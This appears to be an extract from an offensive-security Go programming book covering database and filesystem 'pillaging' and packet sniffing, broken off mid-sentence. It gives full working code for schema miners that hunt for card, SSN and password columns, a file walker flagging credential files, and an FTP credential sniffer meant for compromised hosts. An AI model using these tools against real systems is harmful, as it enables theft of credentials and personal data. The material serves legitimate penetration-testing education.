Installing and Seeding Microsoft SQL Server Databases In 2016, Microsoft began making major moves to open-source some of its core technologies. One of those technologies was Microsoft SQL (MSSQL) Server. It feels pertinent to highlight this information while demonstrating what, for so long, wasn’t possible—that is, installing MSSQL Server on a Linux operating system. Better yet, there’s a Docker image for it, which you can install with the following command: $ docker run --name some-mssql -p 1433:1433 -e 'ACCEPT_EULA=Y' \ -e 'SA_PASSWORD=Password1!' -d microsoft/mssql-server-linux That command is similar to the others you ran in the previous two sections, but per the documentation, the SA_PASSWORD value needs to be complex—a combination of uppercase letters, lowercase letters, numbers, and special characters—or you won’t be able to authenticate to it. Since this is just a test instance, the preceding value is trivial but minimally meets those requirements—just as we see on enterprise networks all the time! 前沿信安资讯阵地 公众号:i nf osrc 158 Chapter 7 With the image installed, start the container, create the schema, and seed the database, as in Listing 7-5. $ docker exec -it some-mssql /opt/mssql-tools/bin/sqlcmd -S localhost \ -U sa -P 'Password1!' > create database store; > go > use store; > create table transactions(ccnum varchar(32), date date, amount decimal(7,2), > cvv char(4), exp date); > go > insert into transactions(ccnum, date, amount, cvv, exp) values > ('4444333322221111', '2019-01-05', 100.12, '1234', '2020-09-01'); > insert into transactions(ccnum, date, amount, cvv, exp) values > ('4444123456789012', '2019-01-07', 2400.18, '5544', '2021-02-01'); > insert into transactions(ccnum, date, amount, cvv, exp) values > ('4465122334455667', '2019-01-29', 1450.87, '9876', '2020-06-01'); > go Listing 7-5: Creating and seeding an MSSQL database The previous listing replicates the logic we demonstrated for MySQL and Postgres earlier. It uses Docker to connect to the service, creates and connects to the store database, and creates and seeds a transactions table. We’re presenting it separately from the other SQL databases because it has some MSSQL-specific syntax. Connecting and Querying Databases in Go Now that you have a variety of test databases to work with, you can build the logic to connect to and query those databases from a Go client. We’ve divided this discussion into two topics—one for MongoDB and one for traditional SQL databases. Querying MongoDB Despite having an excellent standard SQL package, Go doesn’t maintain a similar package for interacting with NoSQL databases. Instead you’ll need to rely on third-party packages to facilitate this interaction. Rather than inspect the implementation of each third-party package, we’ll focus purely on MongoDB. We’ll use the mgo (pronounce mango) DB driver for this. Start by installing the mgo driver with the following command: $ go get gopkg.in/mgo.v2 You can now establish connectivity and query your store collection (the equivalent of a table), which requires even less code than the SQL sample code we’ll create later (see Listing 7-6). 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 159 package main import ( "fmt" "log" mgo "gopkg.in/mgo.v2" ) type Transaction struct { u CCNum string `bson:"ccnum"` Date string `bson:"date"` Amount float32 `bson:"amount"` Cvv string `bson:"cvv"` Expiration string `bson:"exp"` } func main() { session, err := mgo.Dial("") v if err != nil { log.Panicln(err) } defer session.Close() results := make([]Transaction, 0) if err := session.DB("store").C("transactions").Find(nil).All(&results)w; err != nil { log.Panicln(err) } for _, txn := range results { x fmt.Println(txn.CCNum, txn.Date, txn.Amount, txn.Cvv, txn.Expiration) } } Listing 7-6: Connecting to and querying a MongoDB database (/ch-7/db /mongo-connect/main.go) First, you define a type, Transaction, which will represent a single document from your store collection u. The internal mechanism for data representation in MongoDB is binary JSON. For this reason, use tagging to define any marshaling directives. In this case, you’re using tagging to explicitly define the element names to be used in the binary JSON data. In your main() function v, call mgo.Dial() to create a session by establish- ing a connection to your database, testing to make sure no errors occurred, and deferring a call to close the session. You then use the session variable to query the store database w, retrieving all the records from the transactions collection. You store the results in a Transaction slice, named results. Under the covers, your structure tags are used to unmarshal the binary JSON to your defined type. Finally, loop over your result set and print them to the screen x. In both this case and the SQL sample in the next section, your output should look similar to the following: $ go run main.go 4444333322221111 2019-01-05 100.12 1234 09/2020 前沿信安资讯阵地 公众号:i nf osrc 160 Chapter 7 4444123456789012 2019-01-07 2400.18 5544 02/2021 4465122334455667 2019-01-29 1450.87 9876 06/2020 Querying SQL Databases Go contains a standard package, called database/sql, that defines an inter- face for interacting with SQL and SQL-like databases. The base implemen- tation automatically includes functionality such as connection pooling and transaction support. Database drivers adhering to this interface automati- cally inherit these capabilities and are essentially interchangeable, as the API remains consistent between drivers. The function calls and implemen- tation in your code are identical whether you’re using Postgres, MSSQL, MySQL, or some other driver. This makes it convenient to switch backend databases with minimal code change on the client. Of course, the drivers can implement database-specific capabilities and use different SQL syntax, but the function calls are nearly identical. For this reason, we’ll show you how to connect to just one SQL database— MySQL—and leave the other SQL databases as an exercise for you. You start by installing the driver with the following command: $ go get github.com/go-sql-driver/mysql Then, you can create a basic client that connects to the database and retrieves the information from your transactions table—using the script in Listing 7-7. package main import ( "database/sql" u "fmt" "log" "github.com/go-sql-driver/mysql" v ) func main() { db, err := sql.Open("mysql", "root:password@tcp(")w if err != nil { log.Panicln(err) } defer db.Close() var ( ccnum, date, cvv, exp string amount float32 ) rows, err := db.Query("SELECT ccnum, date, amount, cvv, exp FROM transactions") x 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 161 if err != nil { log.Panicln(err) } defer rows.Close() for rows.Next() { err := rows.Scan(&ccnum, &date, &amount, &cvv, &exp)y if err != nil { log.Panicln(err) } fmt.Println(ccnum, date, amount, cvv, exp) } if rows.Err() != nil { log.Panicln(err) } } Listing 7-7: Connecting to and querying a MySQL database (/ch-7/db /mysql-connect/main.go) The code begins by importing Go’s database/sql package u. This allows you to utilize Go’s awesome standard SQL library interface to interact with the database. You also import your MySQL database driver v. The leading underscore indicates that it’s imported anonymously, which means its exported types aren’t included, but the driver registers itself with the sql package so that the MySQL driver itself handles the function calls. Next, you call sql.Open() to establish a connection to our database w. The first parameter specifies which driver should be used—in this case, the driver is mysql—and the second parameter specifies your connection string. You then query your database, passing an SQL statement to select all rows from your transactions table x, and then loop over the rows, subsequently reading the data into your variables and printing the values y. That’s all you need to do to query a MySQL database. Using a different backend database requires only the following minor changes to the code: 1. Import the correct database driver. 2. Change the parameters passed to sql.Open(). 3. Tweak the SQL syntax to the flavor required by your backend database. Among the several database drivers available, many are pure Go, while a handful of others use cgo for some underlying interaction. Check out the list of available drivers at https://github.com/golang/go/wiki/SQLDrivers/. Building a Database Miner In this section, you will create a tool that inspects the database schema (for example, column names) to determine whether the data within is worth pil- fering. For instance, say you want to find passwords, hashes, social security 前沿信安资讯阵地 公众号:i nf osrc 162 Chapter 7 numbers, and credit card numbers. Rather than building one monolithic utility that mines various backend databases, you’ll create separate utilities— one for each database—and implement a defined interface to ensure con- sistency between the implementations. This flexibility may be somewhat overkill for this example, but it gives you the opportunity to create reusable and portable code. The interface should be minimal, consisting of a few basic types and functions, and it should require the implementation of a single method to retrieve database schema. Listing 7-8, called dbminer.go, defines the data- base miner’s interface. package dbminer import ( "fmt" "regexp" ) u type DatabaseMiner interface { GetSchema() (*Schema, error) } v type Schema struct { Databases []Database } type Database struct { Name string Tables []Table } type Table struct { Name string Columns []string } w func Search(m DatabaseMiner) error { x s, err := m.GetSchema() if err != nil { return err } re := getRegex() y for _, database := range s.Databases { for _, table := range database.Tables { for _, field := range table.Columns { for _, r := range re { if r.MatchString(field) { fmt.Println(database) fmt.Printf("[+] HIT: %s\n", field) } 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 163 } } } } return nil } z func getRegex() []*regexp.Regexp { return []*regexp.Regexp{ regexp.MustCompile(`(?i)social`), regexp.MustCompile(`(?i)ssn`), regexp.MustCompile(`(?i)pass(word)?`), regexp.MustCompile(`(?i)hash`), regexp.MustCompile(`(?i)ccnum`), regexp.MustCompile(`(?i)card`), regexp.MustCompile(`(?i)security`), regexp.MustCompile(`(?i)key`), } } /* Extranneous code omitted for brevity */ Listing 7-8: Database miner implementation (/ch-7/db /dbminer/dbminer.go) The code begins by defining an interface named DatabaseMiner u. A single method, called GetSchema(), is required for any types that implement the interface. Because each backend database may have specific logic to retrieve the database schema, the expectation is that each specific utility can implement the logic in a way that’s unique to the backend database and driver in use. Next, you define a Schema type, which is composed of a few subtypes also defined here v. You’ll use the Schema type to logically represent the database schema—that is, databases, tables, and columns. You might have noticed that your GetSchema() function, within the interface definition, expects implementations to return a *Schema. Now, you define a single function, called Search(), which contains the bulk of the logic. The Search() function expects a DatabaseMiner instance to be passed to it during the function call, and stores the miner value in a vari- able named m w. The function starts by calling m.GetSchema() to retrieve the schema x. The function then loops through the entire schema, searching against a list of regular expression (regex) values for column names that match y. If it finds a match, the database schema and matching field are printed to the screen. Lastly, define a function named getRegex() z. This function compiles regex strings by using Go’s regexp package and returns a slice of these values. The regex list consists of case-insensitive strings that match against common or interesting field names such as ccnum, ssn, and password. With your database miner’s interface in hand, you can create utility- specific implementations. Let’s start with the MongoDB database miner. 前沿信安资讯阵地 公众号:i nf osrc 164 Chapter 7 Implementing a MongoDB Database Miner The MongoDB utility program in Listing 7-9 implements the interface defined in Listing 7-8 while also integrating the database connectivity code you built in Listing 7-6. package main import ( "os" u "github.com/bhg/ch-7/db/dbminer" "gopkg.in/mgo.v2" "gopkg.in/mgo.v2/bson" ) v type MongoMiner struct { Host string session *mgo.Session } w func New(host string) (*MongoMiner, error) { m := MongoMiner{Host: host} err := m.connect() if err != nil { return nil, err } return &m, nil } x func (m *MongoMiner) connect() error { s, err := mgo.Dial(m.Host) if err != nil { return err } m.session = s return nil } y func (m *MongoMiner) GetSchema() (*dbminer.Schema, error) { var s = new(dbminer.Schema) dbnames, err := m.session.DatabaseNames()z if err != nil { return nil, err } for _, dbname := range dbnames { db := dbminer.Database{Name: dbname, Tables: []dbminer.Table{}} collections, err := m.session.DB(dbname).CollectionNames(){ if err != nil { return nil, err } 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 165 for _, collection := range collections { table := dbminer.Table{Name: collection, Columns: []string{}} var docRaw bson.Raw err := m.session.DB(dbname).C(collection).Find(nil).One(&docRaw)| if err != nil { return nil, err } var doc bson.RawD if err := docRaw.Unmarshal(&doc); err != nil {} if err != nil { return nil, err } } for _, f := range doc { table.Columns = append(table.Columns, f.Name) } db.Tables = append(db.Tables, table) } s.Databases = append(s.Databases, db) } return s, nil } func main() { mm, err := New(os.Args[1]) if err != nil { panic(err) } ~ if err := dbminer.Search(mm); err != nil { panic(err) } } Listing 7-9: Creating a MongoDB database miner (/ch-7/db/mongo/main.go) You start by importing the dbminer package that defines your Database Miner interface u. Then you define a MongoMiner type that will be used to implement the interface v. For convenience, you define a New() function that creates a new instance of your MongoMiner type w, calling a method named connect() that establishes a connection to the database x. The entirety of this logic essentially bootstraps your code, connecting to the database in a fashion similar to that discussed in Listing 7-6. The most interesting portion of the code is your implementation of the GetSchema() interface method y. Unlike in the previous MongoDB sample code in Listing 7-6, you are now inspecting the MongoDB meta- data, first retrieving database names z and then looping over those data- bases to retrieve each database’s collection names {. Lastly, the function retrieves the raw document that, unlike a typical MongoDB query, uses lazy 前沿信安资讯阵地 公众号:i nf osrc 166 Chapter 7 unmarshaling |. This allows you to explicitly unmarshal the record into a generic structure so that you can inspect field names }. If not for lazy unmarshaling, you would have to define an explicit type, likely using bson tag attributes, in order to instruct your code how to unmarshal the data into a struct you defined. In this case, you don’t know (or care) about the field types or structure—you just want the field names (not the data)—so this is how you can unmarshal structured data without needing to know the structure of that data beforehand. Your main() function expects the IP address of your MongoDB instance as its lone argument, calls your New() function to bootstrap everything, and then calls dbminer.Search(), passing to it your MongoMiner instance ~. Recall that dbminer.Search() calls GetSchema() on the received DatabaseMiner instance; this calls your MongoMiner implementation of the function, which results in the creation of dbminer.Schema that is then searched against the regex list in Listing 7-8. When you run your utility, you are blessed with the following output: $ go run main.go [DB] = store [TABLE] = transactions [COL] = _id [COL] = ccnum [COL] = date [COL] = amount [COL] = cvv [COL] = exp [+] HIT: ccnum You found a match! It may not look pretty, but it gets the job done— successfully locating the database collection that has a field named ccnum. With your MongoDB implementation built, in the next section, you’ll do the same for a MySQL backend database. Implementing a MySQL Database Miner To make your MySQL implementation work, you’ll inspect the information _schema.columns table. This table maintains metadata about all the databases and their structures, including table and column names. To make the data the simplest to consume, use the following SQL query, which removes infor- mation about some of the built-in MySQL databases that are of no conse- quence to your pillaging efforts: SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM columns WHERE TABLE_SCHEMA NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys') ORDER BY TABLE_SCHEMA, TABLE_NAME 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 167 The query produces results resembling the following: +--------------+--------------+-------------+ | TABLE_SCHEMA | TABLE_NAME | COLUMN_NAME | +--------------+--------------+-------------+ | store | transactions | ccnum | | store | transactions | date | | store | transactions | amount | | store | transactions | cvv | | store | transactions | exp | --snip-- Although using that query to retrieve schema information is pretty straightforward, the complexity in your code comes from logically trying to differentiate and categorize each row while defining your GetSchema() function. For example, consecutive rows of output may or may not belong to the same database or table, so associating the rows to the correct dbminer .Database and dbminer.Table instances becomes a somewhat tricky endeavor. Listing 7-10 defines the implementation. type MySQLMiner struct { Host string Db sql.DB } func New(host string) (*MySQLMiner, error) { m := MySQLMiner{Host: host} err := m.connect() if err != nil { return nil, err } return &m, nil } func (m *MySQLMiner) connect() error { db, err := sql.Open( "mysql", u fmt.Sprintf("root:password@tcp(%s:3306)/information_schema", m.Host)) if err != nil { log.Panicln(err) } m.Db = *db return nil } func (m *MySQLMiner) GetSchema() (*dbminer.Schema, error) { var s = new(dbminer.Schema) 前沿信安资讯阵地 公众号:i nf osrc 168 Chapter 7 v sql := `SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM columns WHERE TABLE_SCHEMA NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys') ORDER BY TABLE_SCHEMA, TABLE_NAME` schemarows, err := m.Db.Query(sql) if err != nil { return nil, err } defer schemarows.Close() var prevschema, prevtable string var db dbminer.Database var table dbminer.Table w for schemarows.Next() { var currschema, currtable, currcol string if err := schemarows.Scan(&currschema, &currtable, &currcol); err != nil { return nil, err } x if currschema != prevschema { if prevschema != "" { db.Tables = append(db.Tables, table) s.Databases = append(s.Databases, db) } db = dbminer.Database{Name: currschema, Tables: []dbminer.Table{}} prevschema = currschema prevtable = "" } y if currtable != prevtable { if prevtable != "" { db.Tables = append(db.Tables, table) } table = dbminer.Table{Name: currtable, Columns: []string{}} prevtable = currtable } z table.Columns = append(table.Columns, currcol) } db.Tables = append(db.Tables, table) s.Databases = append(s.Databases, db) if err := schemarows.Err(); err != nil { return nil, err } return s, nil } func main() { mm, err := New(os.Args[1]) if err != nil { panic(err) } defer mm.Db.Close() 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 169 if err := dbminer.Search(mm); err != nil { panic(err) } } Listing 7-10: Creating a MySQL database miner (/ch-7/db/mysql/main.go/) A quick glance at the code and you’ll probably realize that much of it is very, very similar to the MongoDB example in the preceding section. As a matter of fact, the main() function is identical. The bootstrapping functions are also similar—you just change the logic to interact with MySQL rather than MongoDB. Notice that this logic connects to your information_schema database u, so that you can inspect the database schema. Much of the code’s complexity resides within the GetSchema() implemen- tation. Although you are able to retrieve the schema information by using a single database query v, you then have to loop over the results w, inspect- ing each row so you can determine what databases exist, what tables exist in each database, and what columns exist for each table. Unlike in your MongoDB implementation, you don’t have the luxury of JSON/BSON with attribute tags to marshal and unmarshal data into complex structures; you maintain variables to track the information in your current row and com- pare it with the data from the previous row, in order to determine whether you’ve encountered a new database or table. Not the most elegant solution, but it gets the job done. Next, you check whether the database name for your current row differs from your previous row x. If so, you create a new miner.Database instance. If it isn’t your first iteration of the loop, add the table and data- base to your miner.Schema instance. You use similar logic to track and add miner.Table instances to your current miner.Database y. Lastly, add each of the columns to our miner.Table z. Now, run the program against your Docker MySQL instance to confirm that it works properly, as shown here: $ go run main.go [DB] = store [TABLE] = transactions [COL] = ccnum [COL] = date [COL] = amount [COL] = cvv [COL] = exp [+] HIT: ccnum The output should be almost indiscernible from your MongoDB output. This is because your dbminer.Schema isn’t producing any output—the dbminer .Search() function is. This is the power of using interfaces. You can have 前沿信安资讯阵地 公众号:i nf osrc 170 Chapter 7 specific implementations of key features, yet still utilize a single, standard function to process your data in a predictable, usable manner. In the next section, you’ll step away from databases and instead focus on pillaging filesystems. Pillaging a Filesystem In this section, you’ll build a utility that walks a user-supplied filesystem path recursively, matching against a list of interesting filenames that you would deem useful as part of a post-exploitation exercise. These files may contain, among other things, personally identifiable information, user- names, passwords, system logins, and password database files. The utility looks specifically at filenames rather than file contents, and the script is made much simpler by the fact that Go contains standard func- tionality in its path/filepath package that you can use to easily walk a direc- tory structure. You can see the utility in Listing 7-11. package main import ( "fmt" "log" "os" "path/filepath" "regexp" ) u var regexes = []*regexp.Regexp{ regexp.MustCompile(`(?i)user`), regexp.MustCompile(`(?i)password`), regexp.MustCompile(`(?i)kdb`), regexp.MustCompile(`(?i)login`), } v func walkFn(path string, f os.FileInfo, err error) error { for _, r := range regexes { w if r.MatchString(path) { fmt.Printf("[+] HIT: %s\n", path) } } return nil } func main() { root := os.Args[1] x if err := filepath.Walk(root, walkFn); err != nil { log.Panicln(err) } } Listing 7-11: Walking and searching a filesystem (/ch-7/filesystem/main.go) 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 171 In contrast to your database-mining implementations, the filesystem pillaging setup and logic might seem a little too simple. Similar to the way you created your database implementations, you define a regex list for iden- tifying interesting filenames u. To keep the code minimal, we limited the list to just a handful of items, but you can expand the list to accommodate more practical usage. Next, you define a function, named walkFn(), that accepts a file path and some additional parameters v. The function loops over your regular expression list and checks for matches w, displaying them to stdout. The walkFn() function x is used in the main() function, and passed as a param- eter to filepath.Walk(). The Walk() function expects two parameters—a root path and a function (in this case, walkFn())—and recursively walks the directory structure starting at the value supplied as the root path, calling walkFn() for every directory and file it encounters. With your utility complete, navigate to your desktop and create the following directory structure: $ tree targetpath/ targetpath/ --- anotherpath - --- nothing.txt - --- users.csv --- file1.txt --- yetanotherpath --- nada.txt --- passwords.xlsx 2 directories, 5 files Running your utility against this same targetpath directory produces the following output, confirming that your code works splendidly: $ go run main.go ./somepath [+] HIT: somepath/anotherpath/users.csv [+] HIT: somepath/yetanotherpath/passwords.xlsx That’s just about all there is to it. You can improve the sample code through the inclusion of additional or more-specific regular expressions. Further, we encourage you to improve the code by applying the regular expression check only to filenames, not directories. Another enhancement we encourage you to make is to locate and flag specific files with a recent modified or access time. This metadata can lead you to more important content, including files used as part of critical business processes. 前沿信安资讯阵地 公众号:i nf osrc 172 Chapter 7 Summary In this chapter, we dove into database interactions and filesystem walking, using both Go’s native packages and third-party libraries to inspect data- base metadata and filenames. For an attacker, these resources often contain valuable information, and we created various utilities that allow us to search for this juicy information. In the next chapter, you’ll take a look at practical packet processing. Specifically, you’ll learn how to sniff and manipulate network packets. 前沿信安资讯阵地 公众号:i nf osrc 8 R AW PACK E T PROCE S SING In this chapter, you’ll learn how to capture and process network packets. You can use packet processing for many purposes, including to capture cleartext authentication credentials, alter the application functionality of the packets, or spoof and poison traffic. You can also use it for SYN scanning and for port scanning through SYN-flood protections, among other things. We’ll introduce you to the excellent gopacket package from Google, which will enable you to both decode packets and reassemble the stream of traffic. This package allows you to filter traffic by using the Berkeley Packet Filter (BPF), also called tcpdump syntax; read and write .pcap files; inspect various layers and data; and manipulate packets. We’ll walk through several examples to show you how to identify devices, filter results, and create a port scanner that can bypass SYN-flood protections. 前沿信安资讯阵地 公众号:i nf osrc 174 Chapter 8 Setting Up Your Environment Before working through the code in this chapter, you need to set up your environment. First, install gopacket by entering the following: $ go get github.com/google/gopacket Now, gopacket relies on external libraries and drivers to bypass the oper- ating system’s protocol stack. If you intend to compile the examples in this chapter for use on Linux or macOS, you’ll need to install libpcap-dev. You can do this with most package management utilities such as apt, yum, or brew. Here’s how you install it by using apt (the installation process looks similar for the other two options): $ sudo apt-get install libpcap-dev If you intend to compile and run the examples in this chapter on Windows, you have a couple of options, based on whether you’re going to cross-compile or not. Setting up a development environment is simpler if you don’t cross-compile, but in that case, you’ll have to create a Go devel- opment environment on a Windows machine, which can be unattractive if you don’t want to clutter another environment. For the time being, we’ll assume you have a working environment that you can use to compile Windows binaries. Within this environment, you’ll need to install WinPcap. You can download an installer for free from https://www.winpcap.org/. Identifying Devices by Using the pcap Subpackage Before you can capture network traffic, you must identify available devices on which you can listen. You can do this easily using the gopacket/pcap sub- package, which retrieves them with the following helper function: pcap.Find AllDevs() (ifs []Interface, err error). Listing 8-1 shows how you can use it to list all available interfaces. (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/bhg/.) package main import ( "fmt" "log" "github.com/google/gopacket/pcap" ) func main() { u devices, err := pcap.FindAllDevs() if err != nil { log.Panicln(err) } 前沿信安资讯阵地 公众号:i nf osrc Raw Packet Processing 175 v for _, device := range devices { fmt.Println(device.Namew) x for _, address := range device.Addresses { y fmt.Printf(" IP: %s\n", address.IP) fmt.Printf(" Netmask: %s\n", address.Netmask) } } } Listing 8-1: Listing the available network devices (/ch-8 /identify/main.go) You enumerate your devices by calling pcap.FindAllDevs() u. Then you loop through the devices found v. For each device, you access various properties, including the device.Name w. You also access their IP addresses through the Addresses property, which is a slice of type pcap.InterfaceAddress. You loop through these addresses x, displaying the IP address and netmask to the screen y. Executing your utility produces output similar to Listing 8-2. $ go run main.go enp0s5 IP: Netmask: ffffff00 IP: fe80::553a:14e7:92d2:114b Netmask: ffffffffffffffff0000000000000000 any lo IP: Netmask: ff000000 IP: ::1 Netmask: ffffffffffffffffffffffffffffffff Listing 8-2: Output showing the available network interfaces The output lists the available network interfaces—enp0s5, any, and lo— as well as their IPv4 and IPv6 addresses and netmasks. The output on your system will likely differ from these network details, but it should be similar enough that you can make sense of the information. Live Capturing and Filtering Results Now that you know how to query available devices, you can use gopacket’s features to capture live packets off the wire. In doing so, you’ll also filter the set of packets by using BPF syntax. BPF allows you to limit the contents of what you capture and display so that you see only relevant traffic. It’s com- monly used to filter traffic by protocol and port. For example, you could create a filter to see all TCP traffic destined for port 80. You can also filter traffic by destination host. A full discussion of BPF syntax is beyond the scope of this book. For additional ways to use BPF, take a peek at http://www.tcpdump .org/manpages/pcap-filter.7.html. 前沿信安资讯阵地 公众号:i nf osrc 176 Chapter 8 Listing 8-3 shows the code, which filters traffic so that you capture only TCP traffic sent to or from port 80. package main import ( "fmt" "log" "github.com/google/gopacket" "github.com/google/gopacket/pcap" ) u var ( iface = "enp0s5" snaplen = int32(1600) promisc = false timeout = pcap.BlockForever filter = "tcp and port 80" devFound = false ) func main() { devices, err := pcap.FindAllDevs()v if err != nil { log.Panicln(err) } w for _, device := range devices { if device.Name == iface { devFound = true } } if !devFound { log.Panicf("Device named '%s' does not exist\n", iface) } x handle, err := pcap.OpenLive(iface, snaplen, promisc, timeout) if err != nil { log.Panicln(err) } defer handle.Close() y if err := handle.SetBPFFilter(filter); err != nil { log.Panicln(err) } z source := gopacket.NewPacketSource(handle, handle.LinkType()) for packet := range source.Packets(){ { fmt.Println(packet) } } Listing 8-3: Using a BPF filter to capture specific network traffic (/ch-8/filter/main.go) 前沿信安资讯阵地 公众号:i nf osrc Raw Packet Processing 177 The code starts by defining several variables necessary to set up the packet capture u. Included among these is the name of the interface on which you want to capture data, the snapshot length (the amount of data to capture for each frame), the promisc variable (which determines whether you’ll be running promiscuous mode), and your time-out. Also, you define your BPF filter: tcp and port 80. This will make sure you capture only packets that match those criteria. Within your main() function, you enumerate the available devices v, looping through them to determine whether your desired capture interface exists in your device list w. If the interface name doesn’t exist, then you panic, stating that it’s invalid. What remains in the rest of the main() function is your capturing logic. From a high-level perspective, you need to first obtain or create a *pcap.Handle, which allows you to read and inject packets. Using this handle, you can then apply a BPF filter and create a new packet data source, from which you can read your packets. You create your *pcap.Handle (named handle in the code) by issuing a call to pcap.OpenLive() x. This function receives an interface name, a snapshot length, a boolean value defining whether it’s promiscuous, and a time-out value. These input variables are all defined prior to the main() function, as we detailed previously. Call handle.SetBPFFilter(filter) to set the BPF filter for your handle y, and then use handle as an input while calling gopacket .NewPacketSource(handle, handle.LinkType()) to create a new packet data source z. The second input value, handle.LinkType(), defines the decoder to use when handling packets. Lastly, you actually read packets from the wire by using a loop on source.Packets() {, which returns a channel. As you might recall from previous examples in this book, looping on a channel causes the loop to block when it has no data to read from the channel. When a packet arrives, you read it and print its contents to screen. The output should look like Listing 8-4. Note that the program requires elevated privileges because we’re reading raw content off the network. $ go build -o filter && sudo ./filter PACKET: 74 bytes, wire length 74 cap length 74 @ 2020-04-26 08:44:43.074187 -0500 CDT - Layer 1 (14 bytes) = Ethernet {Contents=[..14..] Payload=[..60..] SrcMAC=00:1c:42:cf:57:11 DstMAC=90:72:40:04:33:c1 EthernetType=IPv4 Length=0} - Layer 2 (20 bytes) = IPv4 {Contents=[..20..] Payload=[..40..] Version=4 IHL=5 TOS=0 Length=60 Id=998 Flags=DF FragOffset=0 TTL=64 Protocol=TCP Checksum=55712 SrcIP= DstIP= Options=[] Padding=[]} - Layer 3 (40 bytes) = TCP {Contents=[..40..] Payload=[] SrcPort=51064 DstPort=80(http) Seq=3543761149 Ack=0 DataOffset=10 FIN=false SYN=true RST=false PSH=false ACK=false URG=false ECE=false CWR=false NS=false Window=29200 Checksum=23908 Urgent=0 Options=[..5..] Padding=[]} PACKET: 74 bytes, wire length 74 cap length 74 @ 2020-04-26 08:44:43.086706 -0500 CDT - Layer 1 (14 bytes) = Ethernet {Contents=[..14..] Payload=[..60..] SrcMAC=00:1c:42:cf:57:11 DstMAC=90:72:40:04:33:c1 EthernetType=IPv4 Length=0} - Layer 2 (20 bytes) = IPv4 {Contents=[..20..] Payload=[..40..] Version=4 IHL=5 TOS=0 Length=60 Id=23414 Flags=DF FragOffset=0 TTL=64 Protocol=TCP Checksum=16919 SrcIP= DstIP= Options=[] Padding=[]} 前沿信安资讯阵地 公众号:i nf osrc 178 Chapter 8 - Layer 3 (40 bytes) = TCP {Contents=[..40..] Payload=[] SrcPort=37314 DstPort=80(http) Seq=2821118056 Ack=0 DataOffset=10 FIN=false SYN=true RST=false PSH=false ACK=false URG=false ECE=false CWR=false NS=false Window=29200 Checksum=40285 Urgent=0 Options=[..5..] Padding=[]} Listing 8-4: Captured packets logged to stdout Although the raw output isn’t very digestible, it certainly contains a nice separation of each layer. You can now use utility functions, such as packet.ApplicationLayer() and packet.Data(), to retrieve the raw bytes for a single layer or the entire packet. When you combine the output with hex .Dump(), you can display the contents in a much more readable format. Play around with this on your own. Sniffing and Displaying Cleartext User Credentials Now let’s build on the code you just created. You’ll replicate some of the functionality provided by other tools to sniff and display cleartext user credentials. Most organizations now operate by using switched networks, which send data directly between two endpoints rather than as a broadcast, making it harder to passively capture traffic in an enterprise environment. However, the following cleartext sniffing attack can be useful when paired with some- thing like Address Resolution Protocol (ARP) poisoning, an attack that can coerce endpoints into communicating with a malicious device on a switched network, or when you’re covertly sniffing outbound traffic from a compro- mised user workstation. In this example, we’ll assume you’ve compromised a user workstation and focus solely on capturing traffic that uses FTP to keep the code brief. With the exception of a few small changes, the code in Listing 8-5 is nearly identical to the code in Listing 8-3. package main import ( "bytes" "fmt" "log" "github.com/google/gopacket" "github.com/google/gopacket/pcap" ) var ( iface = "enp0s5" snaplen = int32(1600) promisc = false timeout = pcap.BlockForever u filter = "tcp and dst port 21" devFound = false ) 前沿信安资讯阵地 公众号:i nf osrc Raw Packet Processing 179 func main() { devices, err := pcap.FindAllDevs() if err != nil { log.Panicln(err) } for _, device := range devices { if device.Name == iface { devFound = true } } if !devFound { log.Panicf("Device named '%s' does not exist\n", iface) } handle, err := pcap.OpenLive(iface, snaplen, promisc, timeout) if err != nil { log.Panicln(err) } defer handle.Close() if err := handle.SetBPFFilter(filter); err != nil { log.Panicln(err) } source := gopacket.NewPacketSource(handle, handle.LinkType()) for packet := range source.Packets() { v appLayer := packet.ApplicationLayer() if appLayer == nil { continue } w payload := appLayer.Payload() x if bytes.Contains(payload, []byte("USER")) { fmt.Print(string(payload)) } else if bytes.Contains(payload, []byte("PASS")) { fmt.Print(string(payload)) } } } Listing 8-5: Capturing FTP authentication credentials (/ch-8 /ftp/main.go) The changes you made encompass only about 10 lines of code. First, you change your BPF filter to capture only traffic destined for port 21 (the port commonly used for FTP traffic) u. The rest of the code remains the same until you process the packets. To process packets, you first extract the application layer from the packet and check to see whether it actually exists v, because the application layer contains the FTP commands and data. You look for the application layer by examining whether the response value from packet.ApplicationLayer() is nil. Assuming the application layer exists in the packet, you extract the payload (the FTP commands/data) from the layer by calling appLayer.Payload() w. 前沿信安资讯阵地 公众号:i nf osrc 180 Chapter 8 (There are similar methods for extracting and inspecting other layers and data, but you only need the application layer payload.) With your payload extracted, you then check whether the payload contains either the USER or PASS commands x, indicating that it’s part of a login sequence. If it does, display the payload to the screen. Here’s a sample run that captures an FTP login attempt: $ go build -o ftp && sudo ./ftp USER someuser PASS passw0rd Of course, you can improve this code. In this example, the payload will be displayed if the words USER or PASS exist anywhere in the payload. Really, the code should be searching only the beginning of the payload to elimi- nate false-positives that occur when those keywords appear as part of file contents transferred between client and server or as part of a longer word such as PASSAGE or ABUSER. We encourage you to make these improvements as a learning exercise. Port Scanning Through SYN-flood Protections In Chapter 2, you walked through the creation of a port scanner. You improved the code through multiple iterations until you had a high- performing implementation that produced accurate results. However, in some instances, that scanner can still produce incorrect results. Specifically, when an organization employs SYN-flood protections, typically all ports— open, closed, and filtered alike—produce the same packet exchange to indicate that the port is open. These protections, known as SYN cookies, prevent SYN-flood attacks and obfuscate the attack surface, producing false-positives. When a target is using SYN cookies, how can you determine whether a service is listening on a port or a device is falsely showing that the port is open? After all, in both cases, the TCP three-way handshake is completed. Most tools and scanners (Nmap included) look at this sequence (or some variation of it, based on the scan type you’ve chosen) to determine the status of the port. Therefore, you can’t rely on these tools to produce accurate results. However, if you consider what happens after you’ve established a connec- tion—an exchange of data, perhaps in the form of a service banner—you can deduce whether an actual service is 